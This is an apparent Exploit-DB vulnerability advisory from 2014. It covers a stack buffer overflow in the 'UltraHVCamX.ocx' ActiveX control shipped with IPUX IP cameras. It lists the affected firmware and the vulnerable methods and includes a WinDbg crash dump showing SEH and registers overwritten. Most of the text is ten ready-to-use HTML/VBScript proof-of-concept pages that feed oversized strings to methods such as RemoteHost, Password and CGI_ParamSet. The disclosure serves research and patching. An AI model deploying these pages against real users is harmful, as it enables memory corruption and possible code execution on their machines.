IPUX CS7522/CS2330/CS2030 IP Camera – ‘UltraHVCamX.ocx’ ActiveX Stack Buffer Overflow

  • 作者: LiquidWorm
    日期: 2014-12-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35422/
  • 
    IPUX CS7522/CS2330/CS2030 IP Camera (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow
    
    
    Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
    Product web page: http://www.ipux.net | http://www.fitivision.com
    Affected version: PT Type ICS2330 (firmware: ICS2330 1.1.0-29 20140120 r4296)
    Cube Type ICS2030 (firmware: ICS2030 1.1.0-21 20130223 r3967)
    Dome Type ICS7522 (firmware: ICS7522 1.1.0-7 20120413 r3812)
    
    Summary: The device is H.264 Wired/Wireless IP Camera with 1.3 Mega-pixel sensor.
    With high performance H.264 video compression, the file size of video stream is
    extremely reduced, as to optimize the network bandwidth efficiency. It has full
    Pan/Tilt function and 3X digital zoom feature for a larger space monitoring. The
    built-in USB port provides a convenient and portable storage option for local storage
    of event and schedule recording, especially network disconnected.
    
    Desc: The UltraHVCam ActiveX Control 'UltraHVCamX.ocx' suffers from a stack buffer
    overflow vulnerability when parsing large amount of bytes to several functions in
    UltraHVCamLib, resulting in memory corruption overwriting several registers including
    the SEH. An attacker can gain access to the system of the affected node and execute
    arbitrary code.
    
    ----------------------------------------------------------------------------------
    
    (4b24.478c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraHVCamX.ocx - 
    eax=02d04d4f ebx=001dc890 ecx=41414141 edx=41414141 esi=001d6d6c edi=00000009
    eip=10032459 esp=0030efe8 ebp=0030efec iopl=0 nv up ei pl nz na pe nc
    cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010206
    UltraHVCamX!DllUnregisterServer+0x100e9:
    10032459 8b12mov edx,dword ptr [edx]ds:002b:41414141=????????
    0:000> d ecx
    41414141?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
    41414151?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
    41414161?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
    41414171?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
    41414181?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
    41414191?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
    414141a1?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
    414141b1?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
    0:000> d eax
    02d04d4f41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
    02d04d5f41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
    02d04d6f41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
    02d04d7f41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
    02d04d8f41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
    02d04d9f41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
    02d04daf41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
    02d04dbf41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA
    
    ----------------------------------------------------------------------------------
    
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
    
    
    Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2014-5212
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5212.php
    
    
    16.11.2014
    
    ---
    
    
    Properties:
    -----------
    
    FileDescription		UltraHVCam ActiveX Control
    FileVersion		1, 0, 52, 55 and 1, 0, 52, 54
    InternalName		UltraHVCamX
    OriginalFileName	UltraHVCamX.ocx
    ProductName		UltraHVCam device ActiveX Control
    ProductVersion		1, 0, 52, 55 and 1, 0, 52, 54
    
    
    List of members:
    ----------------
    
    Interface IUltraHVCamX : IDispatch
    Default Interface: True
    Members : 66
    	RemoteHost
    	RemotePort
    	AccountCode
    	GetConfigValue
    	SetConfigValue
    	SetCGIAPNAME
    	Password
    	UserName
    	fChgImageSize
    	ImgWidth
    	ImgHeight
    	SnapFileName
    	AVIRecStart
    	SetImgScale
    	OpenFolder
    	OpenFileDlg
    	TriggerStatus
    	AVIRecStatus
    	Event_Frame
    	PlayVideo
    	SetAutoScale
    	Event_Signal
    	WavPlay
    	CGI_ParamGet
    	CGI_ParamSet
    	MulticastEnable
    	MulticastStatus
    	SetPTUserAllow
    	SetLanguage
    	SetZoomButtonFontColor
    	SetZoomButtonColor
    	SetFullScreen
    
    
    Vulnerable members of the class:
    --------------------------------
    
    RemoteHost
    AccountCode
    SetCGIAPNAME
    Password
    UserName
    SnapFileName
    OpenFolder
    CGI_ParamGet
    CGI_ParamSet
    MulticastEnable
    
    
    PoC(s):
    -------
    
    
    ---1
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Function MulticastEnable ( ByVal sIP As String ,ByVal lPort As Long ) As Long"
    memberName = "MulticastEnable"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 2
    arg1=String(13332, "A")
    arg2=1
    target.MulticastEnable arg1 ,arg2 
    </script>
    </html>
    
    
    ---2
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let RemoteHost As String"
    memberName = "RemoteHost"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(2068, "A")
    target.RemoteHost = arg1
    </script>
    </html>
    
    
    ---3
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let AccountCode As String"
    memberName = "AccountCode"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.AccountCode = arg1
    </script>
    </html>
    
    
    ---4
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let SetCGIAPNAME As String"
    memberName = "SetCGIAPNAME"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.SetCGIAPNAME = arg1
    </script>
    </html>
    
    
    ---5
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let Password As String"
    memberName = "Password"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.Password = arg1
    </script>
    </html>
    
    
    ---6
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let UserName As String"
    memberName = "UserName"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.UserName = arg1
    </script>
    </html>
    
    
    ---7
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Property Let SnapFileName As String"
    memberName = "SnapFileName"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.SnapFileName = arg1
    </script>
    </html>
    
    
    ---8
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Function OpenFolder ( ByVal sInitPath As String ) As String"
    memberName = "OpenFolder"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 1
    arg1=String(1044, "A")
    target.OpenFolder arg1 
    </script>
    </html>
    
    
    ---9
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Function CGI_ParamGet ( ByVal sGroup As String ,ByVal sName As String ) As String"
    memberName = "CGI_ParamGet"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 2
    arg1=String(1044, "A")
    arg2="defaultV"
    target.CGI_ParamGet arg1 ,arg2 
    </script>
    </html>
    
    
    ---10
    
    
    <html>
    <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
    <script language='vbscript'>
    targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
    prototype= "Function CGI_ParamSet ( ByVal sGroup As String ,ByVal sName As String ,ByVal SVal As String ) As Long"
    memberName = "CGI_ParamSet"
    progid = "UltraHVCamLib.UltraHVCamX"
    argCount = 3
    arg1=String(1044, "A")
    arg2="defaultV"
    arg3="defaultV"
    target.CGI_ParamSet arg1 ,arg2 ,arg3 
    </script>
    </html>